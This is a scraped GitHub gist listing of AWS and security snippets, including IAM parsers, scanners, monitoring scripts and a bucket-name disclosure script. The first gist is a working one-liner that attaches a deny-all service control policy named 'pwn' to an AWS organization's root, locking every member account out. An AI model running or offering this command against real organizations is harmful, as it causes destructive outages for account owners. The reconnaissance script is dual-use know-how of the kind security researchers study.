kmcquade
/ brick-aws.sh
Last active
September 26, 2023 22:52
One-liner to brick AWS accounts from the Master Payer
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aws organizations attach-policy \ | |
| --policy-id $(aws organizations create-policy --name pwn \ | |
| --type SERVICE_CONTROL_POLICY \ | |
| --description "pwn" | |
| --content '{"Version": "2012-10-17","Statement": [{"Effect": "Deny", "Action": "*", "Resource": "*"}]}' \ | |
| | jq ".Policy.PolicySummary.Id"\ | |
| ) \ | |
| --target-id $(aws organizations list-roots | jq ".Roots | .[0].Id") |
kmcquade
/ PreventMarketplaceImages.json
Last active
October 27, 2021 14:19
Testing this out with AWS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Version": "2012-10-17", | |
| "Statement": [ | |
| { | |
| "Sid": "VisualEditor0", | |
| "Effect": "Deny", | |
| "Action": "ec2:RunInstances", | |
| "Resource": "arn:aws:ec2:*::image/ami-*", | |
| "Condition": { | |
| "StringNotEquals": { |
kmcquade
/ AWS API calls that return credentials.md
Last active
April 30, 2025 02:52
AWS API calls that return credentials
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import glob | |
| import plistlib | |
| import sys | |
| import xml | |
| import requests | |
| class VulnScanner(object): | |
| def __init__(self): | |
| self.url = 'https://vulmon.com/scannerapi?product={0}&version={1}&dev=1' |
igama
/ binaryedge-daily-check.py
Created
February 28, 2019 20:38
Get a daily update of the IPS, Networks, ASNs you are interested in using BinaryEdge data.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # Example Script | |
| # Get a daily update of what you are interested in. | |
| # What was detected in the last 24hours | |
| # | |
| # For detail on the fields for each message type please check https://docs.binaryedge.io/modules/ | |
| from pybinaryedge import BinaryEdge | |
| import math |
0xdabbad00
/ extract.py
Last active
March 22, 2021 23:37
Parse IAM info from https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_actions-resources-contextkeys.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from os import listdir | |
| from os.path import isfile, join | |
| import re | |
| import json | |
| from bs4 import BeautifulSoup | |
| """ |
0xdabbad00
/ aws actions
Created
August 3, 2018 17:10
AWS API calls as extracted from boto using the technique on https://github.com/duo-labs/cloudtracker#aws_actionstxt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| a4b:AssociateContactWithAddressBook | |
| a4b:AssociateDeviceWithRoom | |
| a4b:AssociateSkillGroupWithRoom | |
| a4b:CreateAddressBook | |
| a4b:CreateContact | |
| a4b:CreateProfile | |
| a4b:CreateRoom | |
| a4b:CreateSkillGroup | |
| a4b:CreateUser | |
| a4b:DeleteAddressBook |
fransr
/ bucket-disclose.sh
Last active
February 16, 2025 14:38
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
I often get asked which tools are good to use for securing your AWS infrastructure so I figured I'd write a short listof some useful Security Tools for the AWS Cloud Infrastructure.
This list is not intended be something completely exhaustive, more so provide a good launching pad for someone as they dig into AWS and want to make it secure from the start.
This section focuses on tools and services provided by the community and released as open-source.
jgamblin
/ certstream-slack.py
Created
February 26, 2018 16:32
A script to search CTLogs for keywords and post new certs to a slack channel.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding=utf-8 | |
| import certstream | |
| import json | |
| import requests | |
| # Get the webhook_url here: | |
| # https://my.slack.com/services/new/incoming-webhook/ |